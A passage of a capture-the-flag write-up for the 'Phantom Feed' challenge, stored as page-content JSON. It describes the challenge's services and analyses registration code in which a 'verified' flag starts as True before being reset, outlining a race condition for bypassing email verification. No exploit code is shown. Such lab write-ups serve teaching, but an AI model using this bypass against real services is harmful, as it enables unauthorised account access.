format.",{"type":33,"tag":47,"props":29501,"children":29502},{},[29503],{"type":33,"tag":2302,"props":29504,"children":29505},{},[29506],{"type":38,"value":29507},"Middleware:",{"type":33,"tag":47,"props":29509,"children":29510},{},[29511],{"type":38,"value":29512},"The middleware ensures that certain routes are accessible only to authenticated users by redirecting to the login page if authentication fails or if the token is missing or invalid.",{"type":33,"tag":81,"props":29514,"children":29516},{"id":29515},"port-4000",[29517],{"type":38,"value":29518},"Port 4000:",{"type":33,"tag":47,"props":29520,"children":29521},{},[29522],{"type":38,"value":29523},"This service is Flask application it allows to get some products and orders.",{"type":33,"tag":47,"props":29525,"children":29526},{},[29527],{"type":33,"tag":2302,"props":29528,"children":29529},{},[29530],{"type":38,"value":29466},{"type":33,"tag":239,"props":29532,"children":29533},{},[29534,29539],{"type":33,"tag":243,"props":29535,"children":29536},{},[29537],{"type":38,"value":29538},"GET / - No middleware - Returns an \"OK\" response.",{"type":33,"tag":243,"props":29540,"children":29541},{},[29542],{"type":38,"value":29543},"POST /orders/html - admin_middleware - Generates a PDF file containing orders in HTML format (Restricted to administrators).",{"type":33,"tag":47,"props":29545,"children":29546},{},[29547],{"type":33,"tag":2302,"props":29548,"children":29549},{},[29550],{"type":38,"value":29507},{"type":33,"tag":47,"props":29552,"children":29553},{},[29554],{"type":38,"value":29555},"The middleware admin_middleware is utilized to limit access to certain routes, only to users classified as administrators.",{"type":33,"tag":40,"props":29557,"children":29559},{"id":29558},"race-condition",[29560],{"type":38,"value":29561},"Race Condition",{"type":33,"tag":88,"props":29563,"children":29565},{"id":29564},"what-is-race-condition",[29566],{"type":38,"value":29567},"What is race 
condition?",{"type":33,"tag":47,"props":29569,"children":29570},{},[29571],{"type":38,"value":29572},"Before starting, it is important to recall what a race condition is:",{"type":33,"tag":22891,"props":29574,"children":29575},{},[29576],{"type":33,"tag":47,"props":29577,"children":29578},{},[29579,29581],{"type":38,"value":29580},"Race conditions are a common type of vulnerability closely related to business logic flaws. They occur when websites process requests concurrently without adequate safeguards. This can lead to multiple distinct threads interacting with the same data at the same time, resulting in a \"collision\" that causes unintended behavior in the application. ",{"type":33,"tag":53,"props":29582,"children":29585},{":target":21222,"href":29583,"rel":29584},"https://portswigger.net/web-security/race-conditions",[57],[29586],{"type":38,"value":29587},"Portswigger",{"type":33,"tag":88,"props":29589,"children":29591},{"id":29590},"initial-entry",[29592],{"type":38,"value":29593},"Initial entry",{"type":33,"tag":47,"props":29595,"children":29596},{},[29597],{"type":38,"value":29598},"Based on the numerous services, the initial entry point would be the token generation service (port 3000). The API that generates tokens has a route for registering a user. The first blocking point is that a message indicates that an email has been sent to us. 
However, no mail service is launched in the challenge.",{"type":33,"tag":75,"props":29600,"children":29602},{"imgSrc":29601},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704230708/writeups/phantom-feed/email_code_sent.webp",[],{"type":33,"tag":47,"props":29604,"children":29605},{},[29606],{"type":38,"value":29607},"And when we try to log in, we can see that the account is not verified.",{"type":33,"tag":75,"props":29609,"children":29611},{"imgSrc":29610},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704230615/writeups/phantom-feed/not_verified.webp",[],{"type":33,"tag":47,"props":29613,"children":29614},{},[29615,29617,29623],{"type":38,"value":29616},"We can see in the code that a boolean attribute ",{"type":33,"tag":105,"props":29618,"children":29620},{"className":29619},[],[29621],{"type":38,"value":29622},"verified",{"type":38,"value":29624}," is set to False during registration. Therefore, we need to find a way to bypass it in order to have a valid account.",{"type":33,"tag":114,"props":29626,"children":29627},{"lang":10227},[29628],{"type":33,"tag":119,"props":29629,"children":29631},{"className":10231,"code":29630,"language":10227,"meta":8,"style":8},"@web.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n  [...]\n  user_valid, user_id = db_session.create_user(username, password, email) # \u003C--- Here the account is created\n  [...]\n  email_client = EmailClient(email)\n  verification_code = db_session.add_verification(user_id) # \u003C--- Here is the boolean set to False\n  email_client.send_email(f\"http://phantomfeed.htb/phantomfeed/confirm?verification_code={verification_code}\")\n  \n  return render_template(\"error.html\", title=\"error\", error=\"verification code sent\"), 
200\n",[29632],{"type":33,"tag":105,"props":29633,"children":29634},{"__ignoreMap":8},[29635,29722,29738,29755,29826,29841,29871,29914,29965,29972],{"type":33,"tag":128,"props":29636,"children":29637},{"class":130,"line":131},[29638,29643,29648,29652,29657,29661,29665,29670,29674,29678,29683,29688,29692,29697,29701,29705,29709,29713,29717],{"type":33,"tag":128,"props":29639,"children":29640},{"style":312},[29641],{"type":38,"value":29642},"@",{"type":33,"tag":128,"props":29644,"children":29645},{"style":135},[29646],{"type":38,"value":29647},"web",{"type":33,"tag":128,"props":29649,"children":29650},{"style":312},[29651],{"type":38,"value":215},{"type":33,"tag":128,"props":29653,"children":29654},{"style":135},[29655],{"type":38,"value":29656},"route",{"type":33,"tag":128,"props":29658,"children":29659},{"style":312},[29660],{"type":38,"value":5566},{"type":33,"tag":128,"props":29662,"children":29663},{"style":676},[29664],{"type":38,"value":669},{"type":33,"tag":128,"props":29666,"children":29667},{"style":140},[29668],{"type":38,"value":29669},"/register",{"type":33,"tag":128,"props":29671,"children":29672},{"style":676},[29673],{"type":38,"value":669},{"type":33,"tag":128,"props":29675,"children":29676},{"style":312},[29677],{"type":38,"value":5584},{"type":33,"tag":128,"props":29679,"children":29680},{"style":306},[29681],{"type":38,"value":29682}," 
methods",{"type":33,"tag":128,"props":29684,"children":29685},{"style":312},[29686],{"type":38,"value":29687},"=[",{"type":33,"tag":128,"props":29689,"children":29690},{"style":676},[29691],{"type":38,"value":669},{"type":33,"tag":128,"props":29693,"children":29694},{"style":140},[29695],{"type":38,"value":29696},"GET",{"type":33,"tag":128,"props":29698,"children":29699},{"style":676},[29700],{"type":38,"value":669},{"type":33,"tag":128,"props":29702,"children":29703},{"style":312},[29704],{"type":38,"value":5584},{"type":33,"tag":128,"props":29706,"children":29707},{"style":676},[29708],{"type":38,"value":679},{"type":33,"tag":128,"props":29710,"children":29711},{"style":140},[29712],{"type":38,"value":1406},{"type":33,"tag":128,"props":29714,"children":29715},{"style":676},[29716],{"type":38,"value":669},{"type":33,"tag":128,"props":29718,"children":29719},{"style":312},[29720],{"type":38,"value":29721},"])\n",{"type":33,"tag":128,"props":29723,"children":29724},{"class":130,"line":362},[29725,29729,29734],{"type":33,"tag":128,"props":29726,"children":29727},{"style":300},[29728],{"type":38,"value":10402},{"type":33,"tag":128,"props":29730,"children":29731},{"style":135},[29732],{"type":38,"value":29733}," register",{"type":33,"tag":128,"props":29735,"children":29736},{"style":312},[29737],{"type":38,"value":10412},{"type":33,"tag":128,"props":29739,"children":29740},{"class":130,"line":403},[29741,29746,29751],{"type":33,"tag":128,"props":29742,"children":29743},{"style":312},[29744],{"type":38,"value":29745},"  
[",{"type":33,"tag":128,"props":29747,"children":29748},{"style":151},[29749],{"type":38,"value":29750},"...",{"type":33,"tag":128,"props":29752,"children":29753},{"style":312},[29754],{"type":38,"value":3262},{"type":33,"tag":128,"props":29756,"children":29757},{"class":130,"line":739},[29758,29763,29767,29772,29776,29781,29785,29790,29794,29799,29803,29808,29812,29817,29821],{"type":33,"tag":128,"props":29759,"children":29760},{"style":323},[29761],{"type":38,"value":29762},"  user_valid",{"type":33,"tag":128,"props":29764,"children":29765},{"style":312},[29766],{"type":38,"value":5584},{"type":33,"tag":128,"props":29768,"children":29769},{"style":323},[29770],{"type":38,"value":29771}," user_id ",{"type":33,"tag":128,"props":29773,"children":29774},{"style":312},[29775],{"type":38,"value":315},{"type":33,"tag":128,"props":29777,"children":29778},{"style":323},[29779],{"type":38,"value":29780}," db_session",{"type":33,"tag":128,"props":29782,"children":29783},{"style":312},[29784],{"type":38,"value":215},{"type":33,"tag":128,"props":29786,"children":29787},{"style":323},[29788],{"type":38,"value":29789},"create_user",{"type":33,"tag":128,"props":29791,"children":29792},{"style":312},[29793],{"type":38,"value":5566},{"type":33,"tag":128,"props":29795,"children":29796},{"style":323},[29797],{"type":38,"value":29798},"username",{"type":33,"tag":128,"props":29800,"children":29801},{"style":312},[29802],{"type":38,"value":5584},{"type":33,"tag":128,"props":29804,"children":29805},{"style":323},[29806],{"type":38,"value":29807}," password",{"type":33,"tag":128,"props":29809,"children":29810},{"style":312},[29811],{"type":38,"value":5584},{"type":33,"tag":128,"props":29813,"children":29814},{"style":323},[29815],{"type":38,"value":29816}," email",{"type":33,"tag":128,"props":29818,"children":29819},{"style":312},[29820],{"type":38,"value":2966},{"type":33,"tag":128,"props":29822,"children":29823},{"style":5541},[29824],{"type":38,"value":29825}," # \u003C--- Here the 
account is created\n",{"type":33,"tag":128,"props":29827,"children":29828},{"class":130,"line":765},[29829,29833,29837],{"type":33,"tag":128,"props":29830,"children":29831},{"style":312},[29832],{"type":38,"value":29745},{"type":33,"tag":128,"props":29834,"children":29835},{"style":151},[29836],{"type":38,"value":29750},{"type":33,"tag":128,"props":29838,"children":29839},{"style":312},[29840],{"type":38,"value":3262},{"type":33,"tag":128,"props":29842,"children":29843},{"class":130,"line":804},[29844,29849,29853,29858,29862,29867],{"type":33,"tag":128,"props":29845,"children":29846},{"style":323},[29847],{"type":38,"value":29848},"  email_client ",{"type":33,"tag":128,"props":29850,"children":29851},{"style":312},[29852],{"type":38,"value":315},{"type":33,"tag":128,"props":29854,"children":29855},{"style":323},[29856],{"type":38,"value":29857}," EmailClient",{"type":33,"tag":128,"props":29859,"children":29860},{"style":312},[29861],{"type":38,"value":5566},{"type":33,"tag":128,"props":29863,"children":29864},{"style":323},[29865],{"type":38,"value":29866},"email",{"type":33,"tag":128,"props":29868,"children":29869},{"style":312},[29870],{"type":38,"value":2427},{"type":33,"tag":128,"props":29872,"children":29873},{"class":130,"line":839},[29874,29879,29883,29887,29891,29896,29900,29905,29909],{"type":33,"tag":128,"props":29875,"children":29876},{"style":323},[29877],{"type":38,"value":29878},"  verification_code 
",{"type":33,"tag":128,"props":29880,"children":29881},{"style":312},[29882],{"type":38,"value":315},{"type":33,"tag":128,"props":29884,"children":29885},{"style":323},[29886],{"type":38,"value":29780},{"type":33,"tag":128,"props":29888,"children":29889},{"style":312},[29890],{"type":38,"value":215},{"type":33,"tag":128,"props":29892,"children":29893},{"style":323},[29894],{"type":38,"value":29895},"add_verification",{"type":33,"tag":128,"props":29897,"children":29898},{"style":312},[29899],{"type":38,"value":5566},{"type":33,"tag":128,"props":29901,"children":29902},{"style":323},[29903],{"type":38,"value":29904},"user_id",{"type":33,"tag":128,"props":29906,"children":29907},{"style":312},[29908],{"type":38,"value":2966},{"type":33,"tag":128,"props":29910,"children":29911},{"style":5541},[29912],{"type":38,"value":29913}," # \u003C--- Here is the boolean set to False\n",{"type":33,"tag":128,"props":29915,"children":29916},{"class":130,"line":848},[29917,29922,29926,29931,29935,29939,29944,29948,29953,29957,29961],{"type":33,"tag":128,"props":29918,"children":29919},{"style":323},[29920],{"type":38,"value":29921},"  
email_client",{"type":33,"tag":128,"props":29923,"children":29924},{"style":312},[29925],{"type":38,"value":215},{"type":33,"tag":128,"props":29927,"children":29928},{"style":323},[29929],{"type":38,"value":29930},"send_email",{"type":33,"tag":128,"props":29932,"children":29933},{"style":312},[29934],{"type":38,"value":5566},{"type":33,"tag":128,"props":29936,"children":29937},{"style":300},[29938],{"type":38,"value":11107},{"type":33,"tag":128,"props":29940,"children":29941},{"style":140},[29942],{"type":38,"value":29943},"\"http://phantomfeed.htb/phantomfeed/confirm?verification_code=",{"type":33,"tag":128,"props":29945,"children":29946},{"style":151},[29947],{"type":38,"value":7246},{"type":33,"tag":128,"props":29949,"children":29950},{"style":323},[29951],{"type":38,"value":29952},"verification_code",{"type":33,"tag":128,"props":29954,"children":29955},{"style":151},[29956],{"type":38,"value":5730},{"type":33,"tag":128,"props":29958,"children":29959},{"style":140},[29960],{"type":38,"value":669},{"type":33,"tag":128,"props":29962,"children":29963},{"style":312},[29964],{"type":38,"value":2427},{"type":33,"tag":128,"props":29966,"children":29967},{"class":130,"line":976},[29968],{"type":33,"tag":128,"props":29969,"children":29970},{"style":323},[29971],{"type":38,"value":5894},{"type":33,"tag":128,"props":29973,"children":29974},{"class":130,"line":988},[29975,29979,29984,29988,29992,29997,30001,30005,30010,30014,30018,30022,30026,30030,30034,30038,30042,30047,30051,30056],{"type":33,"tag":128,"props":29976,"children":29977},{"style":1576},[29978],{"type":38,"value":13056},{"type":33,"tag":128,"props":29980,"children":29981},{"style":323},[29982],{"type":38,"value":29983}," 
render_template",{"type":33,"tag":128,"props":29985,"children":29986},{"style":312},[29987],{"type":38,"value":5566},{"type":33,"tag":128,"props":29989,"children":29990},{"style":676},[29991],{"type":38,"value":669},{"type":33,"tag":128,"props":29993,"children":29994},{"style":140},[29995],{"type":38,"value":29996},"error.html",{"type":33,"tag":128,"props":29998,"children":29999},{"style":676},[30000],{"type":38,"value":669},{"type":33,"tag":128,"props":30002,"children":30003},{"style":312},[30004],{"type":38,"value":5584},{"type":33,"tag":128,"props":30006,"children":30007},{"style":306},[30008],{"type":38,"value":30009}," title",{"type":33,"tag":128,"props":30011,"children":30012},{"style":312},[30013],{"type":38,"value":315},{"type":33,"tag":128,"props":30015,"children":30016},{"style":676},[30017],{"type":38,"value":669},{"type":33,"tag":128,"props":30019,"children":30020},{"style":140},[30021],{"type":38,"value":6889},{"type":33,"tag":128,"props":30023,"children":30024},{"style":676},[30025],{"type":38,"value":669},{"type":33,"tag":128,"props":30027,"children":30028},{"style":312},[30029],{"type":38,"value":5584},{"type":33,"tag":128,"props":30031,"children":30032},{"style":306},[30033],{"type":38,"value":14251},{"type":33,"tag":128,"props":30035,"children":30036},{"style":312},[30037],{"type":38,"value":315},{"type":33,"tag":128,"props":30039,"children":30040},{"style":676},[30041],{"type":38,"value":669},{"type":33,"tag":128,"props":30043,"children":30044},{"style":140},[30045],{"type":38,"value":30046},"verification code sent",{"type":33,"tag":128,"props":30048,"children":30049},{"style":676},[30050],{"type":38,"value":669},{"type":33,"tag":128,"props":30052,"children":30053},{"style":312},[30054],{"type":38,"value":30055},"),",{"type":33,"tag":128,"props":30057,"children":30058},{"style":523},[30059],{"type":38,"value":30060}," 
200\n",{"type":33,"tag":114,"props":30062,"children":30063},{"lang":10227},[30064],{"type":33,"tag":119,"props":30065,"children":30067},{"className":10231,"code":30066,"language":10227,"meta":8,"style":8},"def add_verification(self, user_id):\n    verification_code = generate(12)\n    self.session.query(Users).filter(Users.id == user_id)\n      .update({\"verification_code\": verification_code, \"verified\": False})\n    self.session.commit()\n    return verification_code\n",[30068],{"type":33,"tag":105,"props":30069,"children":30070},{"__ignoreMap":8},[30071,30105,30135,30207,30274,30302],{"type":33,"tag":128,"props":30072,"children":30073},{"class":130,"line":131},[30074,30078,30083,30087,30092,30096,30101],{"type":33,"tag":128,"props":30075,"children":30076},{"style":300},[30077],{"type":38,"value":10402},{"type":33,"tag":128,"props":30079,"children":30080},{"style":135},[30081],{"type":38,"value":30082}," add_verification",{"type":33,"tag":128,"props":30084,"children":30085},{"style":312},[30086],{"type":38,"value":5566},{"type":33,"tag":128,"props":30088,"children":30089},{"style":323},[30090],{"type":38,"value":30091},"self",{"type":33,"tag":128,"props":30093,"children":30094},{"style":312},[30095],{"type":38,"value":5584},{"type":33,"tag":128,"props":30097,"children":30098},{"style":323},[30099],{"type":38,"value":30100}," user_id",{"type":33,"tag":128,"props":30102,"children":30103},{"style":312},[30104],{"type":38,"value":10497},{"type":33,"tag":128,"props":30106,"children":30107},{"class":130,"line":362},[30108,30113,30117,30122,30126,30131],{"type":33,"tag":128,"props":30109,"children":30110},{"style":323},[30111],{"type":38,"value":30112},"    verification_code ",{"type":33,"tag":128,"props":30114,"children":30115},{"style":312},[30116],{"type":38,"value":315},{"type":33,"tag":128,"props":30118,"children":30119},{"style":323},[30120],{"type":38,"value":30121}," 
generate",{"type":33,"tag":128,"props":30123,"children":30124},{"style":312},[30125],{"type":38,"value":5566},{"type":33,"tag":128,"props":30127,"children":30128},{"style":523},[30129],{"type":38,"value":30130},"12",{"type":33,"tag":128,"props":30132,"children":30133},{"style":312},[30134],{"type":38,"value":2427},{"type":33,"tag":128,"props":30136,"children":30137},{"class":130,"line":403},[30138,30143,30147,30151,30155,30159,30163,30168,30172,30177,30181,30185,30189,30194,30199,30203],{"type":33,"tag":128,"props":30139,"children":30140},{"style":151},[30141],{"type":38,"value":30142},"    self",{"type":33,"tag":128,"props":30144,"children":30145},{"style":312},[30146],{"type":38,"value":215},{"type":33,"tag":128,"props":30148,"children":30149},{"style":323},[30150],{"type":38,"value":6557},{"type":33,"tag":128,"props":30152,"children":30153},{"style":312},[30154],{"type":38,"value":215},{"type":33,"tag":128,"props":30156,"children":30157},{"style":323},[30158],{"type":38,"value":5810},{"type":33,"tag":128,"props":30160,"children":30161},{"style":312},[30162],{"type":38,"value":5566},{"type":33,"tag":128,"props":30164,"children":30165},{"style":323},[30166],{"type":38,"value":30167},"Users",{"type":33,"tag":128,"props":30169,"children":30170},{"style":312},[30171],{"type":38,"value":6700},{"type":33,"tag":128,"props":30173,"children":30174},{"style":323},[30175],{"type":38,"value":30176},"filter",{"type":33,"tag":128,"props":30178,"children":30179},{"style":312},[30180],{"type":38,"value":5566},{"type":33,"tag":128,"props":30182,"children":30183},{"style":323},[30184],{"type":38,"value":30167},{"type":33,"tag":128,"props":30186,"children":30187},{"style":312},[30188],{"type":38,"value":215},{"type":33,"tag":128,"props":30190,"children":30191},{"style":323},[30192],{"type":38,"value":30193},"id 
",{"type":33,"tag":128,"props":30195,"children":30196},{"style":300},[30197],{"type":38,"value":30198},"==",{"type":33,"tag":128,"props":30200,"children":30201},{"style":323},[30202],{"type":38,"value":30100},{"type":33,"tag":128,"props":30204,"children":30205},{"style":312},[30206],{"type":38,"value":2427},{"type":33,"tag":128,"props":30208,"children":30209},{"class":130,"line":739},[30210,30215,30220,30224,30228,30232,30236,30240,30245,30249,30253,30257,30261,30265,30270],{"type":33,"tag":128,"props":30211,"children":30212},{"style":312},[30213],{"type":38,"value":30214},"      .",{"type":33,"tag":128,"props":30216,"children":30217},{"style":323},[30218],{"type":38,"value":30219},"update",{"type":33,"tag":128,"props":30221,"children":30222},{"style":312},[30223],{"type":38,"value":5836},{"type":33,"tag":128,"props":30225,"children":30226},{"style":676},[30227],{"type":38,"value":669},{"type":33,"tag":128,"props":30229,"children":30230},{"style":140},[30231],{"type":38,"value":29952},{"type":33,"tag":128,"props":30233,"children":30234},{"style":676},[30235],{"type":38,"value":669},{"type":33,"tag":128,"props":30237,"children":30238},{"style":312},[30239],{"type":38,"value":284},{"type":33,"tag":128,"props":30241,"children":30242},{"style":323},[30243],{"type":38,"value":30244}," verification_code",{"type":33,"tag":128,"props":30246,"children":30247},{"style":312},[30248],{"type":38,"value":5584},{"type":33,"tag":128,"props":30250,"children":30251},{"style":676},[30252],{"type":38,"value":679},{"type":33,"tag":128,"props":30254,"children":30255},{"style":140},[30256],{"type":38,"value":29622},{"type":33,"tag":128,"props":30258,"children":30259},{"style":676},[30260],{"type":38,"value":669},{"type":33,"tag":128,"props":30262,"children":30263},{"style":312},[30264],{"type":38,"value":284},{"type":33,"tag":128,"props":30266,"children":30267},{"style":1576},[30268],{"type":38,"value":30269}," 
False",{"type":33,"tag":128,"props":30271,"children":30272},{"style":312},[30273],{"type":38,"value":23505},{"type":33,"tag":128,"props":30275,"children":30276},{"class":130,"line":765},[30277,30281,30285,30289,30293,30298],{"type":33,"tag":128,"props":30278,"children":30279},{"style":151},[30280],{"type":38,"value":30142},{"type":33,"tag":128,"props":30282,"children":30283},{"style":312},[30284],{"type":38,"value":215},{"type":33,"tag":128,"props":30286,"children":30287},{"style":323},[30288],{"type":38,"value":6557},{"type":33,"tag":128,"props":30290,"children":30291},{"style":312},[30292],{"type":38,"value":215},{"type":33,"tag":128,"props":30294,"children":30295},{"style":323},[30296],{"type":38,"value":30297},"commit",{"type":33,"tag":128,"props":30299,"children":30300},{"style":312},[30301],{"type":38,"value":7857},{"type":33,"tag":128,"props":30303,"children":30304},{"class":130,"line":804},[30305,30309],{"type":33,"tag":128,"props":30306,"children":30307},{"style":1576},[30308],{"type":38,"value":6810},{"type":33,"tag":128,"props":30310,"children":30311},{"style":323},[30312],{"type":38,"value":30313}," verification_code\n",{"type":33,"tag":47,"props":30315,"children":30316},{},[30317],{"type":38,"value":30318},"We can see below that by default the attribute verified is set to True and is only changed to False at the time of sending the email.",{"type":33,"tag":114,"props":30320,"children":30321},{"lang":10227},[30322],{"type":33,"tag":119,"props":30323,"children":30325},{"className":10231,"code":30324,"language":10227,"meta":8,"style":8},"class Users(Base):\n    __tablename__ = \"users\"\n    id = Column(Integer, primary_key=True)\n    verification_code = Column(String)\n    verified = Column(Boolean, default=True)\n    username = Column(String)\n    password = Column(String)\n    email = 
Column(String)\n",[30326],{"type":33,"tag":105,"props":30327,"children":30328},{"__ignoreMap":8},[30329,30356,30381,30429,30456,30502,30530,30558],{"type":33,"tag":128,"props":30330,"children":30331},{"class":130,"line":131},[30332,30337,30343,30347,30352],{"type":33,"tag":128,"props":30333,"children":30334},{"style":300},[30335],{"type":38,"value":30336},"class",{"type":33,"tag":128,"props":30338,"children":30340},{"style":30339},"--shiki-default:#5DA994",[30341],{"type":38,"value":30342}," Users",{"type":33,"tag":128,"props":30344,"children":30345},{"style":312},[30346],{"type":38,"value":5566},{"type":33,"tag":128,"props":30348,"children":30349},{"style":135},[30350],{"type":38,"value":30351},"Base",{"type":33,"tag":128,"props":30353,"children":30354},{"style":312},[30355],{"type":38,"value":10497},{"type":33,"tag":128,"props":30357,"children":30358},{"class":130,"line":362},[30359,30364,30368,30372,30377],{"type":33,"tag":128,"props":30360,"children":30361},{"style":323},[30362],{"type":38,"value":30363},"    __tablename__ ",{"type":33,"tag":128,"props":30365,"children":30366},{"style":312},[30367],{"type":38,"value":315},{"type":33,"tag":128,"props":30369,"children":30370},{"style":676},[30371],{"type":38,"value":679},{"type":33,"tag":128,"props":30373,"children":30374},{"style":140},[30375],{"type":38,"value":30376},"users",{"type":33,"tag":128,"props":30378,"children":30379},{"style":676},[30380],{"type":38,"value":836},{"type":33,"tag":128,"props":30382,"children":30383},{"class":130,"line":403},[30384,30389,30393,30398,30402,30407,30411,30416,30420,30425],{"type":33,"tag":128,"props":30385,"children":30386},{"style":437},[30387],{"type":38,"value":30388},"    id",{"type":33,"tag":128,"props":30390,"children":30391},{"style":312},[30392],{"type":38,"value":5657},{"type":33,"tag":128,"props":30394,"children":30395},{"style":323},[30396],{"type":38,"value":30397}," 
Column",{"type":33,"tag":128,"props":30399,"children":30400},{"style":312},[30401],{"type":38,"value":5566},{"type":33,"tag":128,"props":30403,"children":30404},{"style":323},[30405],{"type":38,"value":30406},"Integer",{"type":33,"tag":128,"props":30408,"children":30409},{"style":312},[30410],{"type":38,"value":5584},{"type":33,"tag":128,"props":30412,"children":30413},{"style":306},[30414],{"type":38,"value":30415}," primary_key",{"type":33,"tag":128,"props":30417,"children":30418},{"style":312},[30419],{"type":38,"value":315},{"type":33,"tag":128,"props":30421,"children":30422},{"style":1576},[30423],{"type":38,"value":30424},"True",{"type":33,"tag":128,"props":30426,"children":30427},{"style":312},[30428],{"type":38,"value":2427},{"type":33,"tag":128,"props":30430,"children":30431},{"class":130,"line":739},[30432,30436,30440,30444,30448,30452],{"type":33,"tag":128,"props":30433,"children":30434},{"style":323},[30435],{"type":38,"value":30112},{"type":33,"tag":128,"props":30437,"children":30438},{"style":312},[30439],{"type":38,"value":315},{"type":33,"tag":128,"props":30441,"children":30442},{"style":323},[30443],{"type":38,"value":30397},{"type":33,"tag":128,"props":30445,"children":30446},{"style":312},[30447],{"type":38,"value":5566},{"type":33,"tag":128,"props":30449,"children":30450},{"style":323},[30451],{"type":38,"value":25569},{"type":33,"tag":128,"props":30453,"children":30454},{"style":312},[30455],{"type":38,"value":2427},{"type":33,"tag":128,"props":30457,"children":30458},{"class":130,"line":765},[30459,30464,30468,30472,30476,30481,30485,30490,30494,30498],{"type":33,"tag":128,"props":30460,"children":30461},{"style":323},[30462],{"type":38,"value":30463},"    verified 
",{"type":33,"tag":128,"props":30465,"children":30466},{"style":312},[30467],{"type":38,"value":315},{"type":33,"tag":128,"props":30469,"children":30470},{"style":323},[30471],{"type":38,"value":30397},{"type":33,"tag":128,"props":30473,"children":30474},{"style":312},[30475],{"type":38,"value":5566},{"type":33,"tag":128,"props":30477,"children":30478},{"style":323},[30479],{"type":38,"value":30480},"Boolean",{"type":33,"tag":128,"props":30482,"children":30483},{"style":312},[30484],{"type":38,"value":5584},{"type":33,"tag":128,"props":30486,"children":30487},{"style":306},[30488],{"type":38,"value":30489}," default",{"type":33,"tag":128,"props":30491,"children":30492},{"style":312},[30493],{"type":38,"value":315},{"type":33,"tag":128,"props":30495,"children":30496},{"style":1576},[30497],{"type":38,"value":30424},{"type":33,"tag":128,"props":30499,"children":30500},{"style":312},[30501],{"type":38,"value":2427},{"type":33,"tag":128,"props":30503,"children":30504},{"class":130,"line":804},[30505,30510,30514,30518,30522,30526],{"type":33,"tag":128,"props":30506,"children":30507},{"style":323},[30508],{"type":38,"value":30509},"    username ",{"type":33,"tag":128,"props":30511,"children":30512},{"style":312},[30513],{"type":38,"value":315},{"type":33,"tag":128,"props":30515,"children":30516},{"style":323},[30517],{"type":38,"value":30397},{"type":33,"tag":128,"props":30519,"children":30520},{"style":312},[30521],{"type":38,"value":5566},{"type":33,"tag":128,"props":30523,"children":30524},{"style":323},[30525],{"type":38,"value":25569},{"type":33,"tag":128,"props":30527,"children":30528},{"style":312},[30529],{"type":38,"value":2427},{"type":33,"tag":128,"props":30531,"children":30532},{"class":130,"line":839},[30533,30538,30542,30546,30550,30554],{"type":33,"tag":128,"props":30534,"children":30535},{"style":323},[30536],{"type":38,"value":30537},"    password 
",{"type":33,"tag":128,"props":30539,"children":30540},{"style":312},[30541],{"type":38,"value":315},{"type":33,"tag":128,"props":30543,"children":30544},{"style":323},[30545],{"type":38,"value":30397},{"type":33,"tag":128,"props":30547,"children":30548},{"style":312},[30549],{"type":38,"value":5566},{"type":33,"tag":128,"props":30551,"children":30552},{"style":323},[30553],{"type":38,"value":25569},{"type":33,"tag":128,"props":30555,"children":30556},{"style":312},[30557],{"type":38,"value":2427},{"type":33,"tag":128,"props":30559,"children":30560},{"class":130,"line":848},[30561,30566,30570,30574,30578,30582],{"type":33,"tag":128,"props":30562,"children":30563},{"style":323},[30564],{"type":38,"value":30565},"    email ",{"type":33,"tag":128,"props":30567,"children":30568},{"style":312},[30569],{"type":38,"value":315},{"type":33,"tag":128,"props":30571,"children":30572},{"style":323},[30573],{"type":38,"value":30397},{"type":33,"tag":128,"props":30575,"children":30576},{"style":312},[30577],{"type":38,"value":5566},{"type":33,"tag":128,"props":30579,"children":30580},{"style":323},[30581],{"type":38,"value":25569},{"type":33,"tag":128,"props":30583,"children":30584},{"style":312},[30585],{"type":38,"value":2427},{"type":33,"tag":47,"props":30587,"children":30588},{},[30589],{"type":38,"value":30590},"We know that: the account is created, and then the boolean is set to False. 
After this, we can therefore ask whether a race condition lets us log in at the moment when the boolean is still True, which would give us a valid token.",{"type":33,"tag":47,"props":30592,"children":30593},{},[30594,30596,30602],{"type":38,"value":30595},"Let's look at the EmailClient class, which is used to call the send-email function ",{"type":33,"tag":105,"props":30597,"children":30599},{"className":30598},[],[30600],{"type":38,"value":30601},"email_client.send_email",{"type":38,"value":215},{"type":33,"tag":114,"props":30604,"children":30605},{"lang":10227},[30606],{"type":33,"tag":119,"props":30607,"children":30609},{"className":10231,"code":30608,"language":10227,"meta":8,"style":8},"email_client = EmailClient(email)\n",[30610],{"type":33,"tag":105,"props":30611,"children":30612},{"__ignoreMap":8},[30613],{"type":33,"tag":128,"props":30614,"children":30615},{"class":130,"line":131},[30616,30621,30625,30629,30633,30637],{"type":33,"tag":128,"props":30617,"children":30618},{"style":323},[30619],{"type":38,"value":30620},"email_client ",{"type":33,"tag":128,"props":30622,"children":30623},{"style":312},[30624],{"type":38,"value":315},{"type":33,"tag":128,"props":30626,"children":30627},{"style":323},[30628],{"type":38,"value":29857},{"type":33,"tag":128,"props":30630,"children":30631},{"style":312},[30632],{"type":38,"value":5566},{"type":33,"tag":128,"props":30634,"children":30635},{"style":323},[30636],{"type":38,"value":29866},{"type":33,"tag":128,"props":30638,"children":30639},{"style":312},[30640],{"type":38,"value":2427},{"type":33,"tag":47,"props":30642,"children":30643},{},[30644],{"type":38,"value":30645},"We can see that a regex is executed inside the constructor of the class.",{"type":33,"tag":114,"props":30647,"children":30648},{"lang":10227},[30649],{"type":33,"tag":119,"props":30650,"children":30652},{"className":10231,"code":30651,"language":10227,"meta":8,"style":8},"class EmailClient:\n    def __init__(self, 
